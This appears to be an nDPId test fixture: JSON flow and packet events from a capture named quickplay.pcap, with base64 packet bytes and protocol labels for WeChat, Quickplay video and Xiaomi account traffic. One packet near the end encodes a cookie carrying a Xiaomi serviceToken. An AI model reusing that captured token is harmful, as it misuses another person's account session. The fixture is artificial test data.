+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="} +00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} 
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} 
+00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} +02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CM
hv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": 
{"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} +00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} 
+00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} +01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} 
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 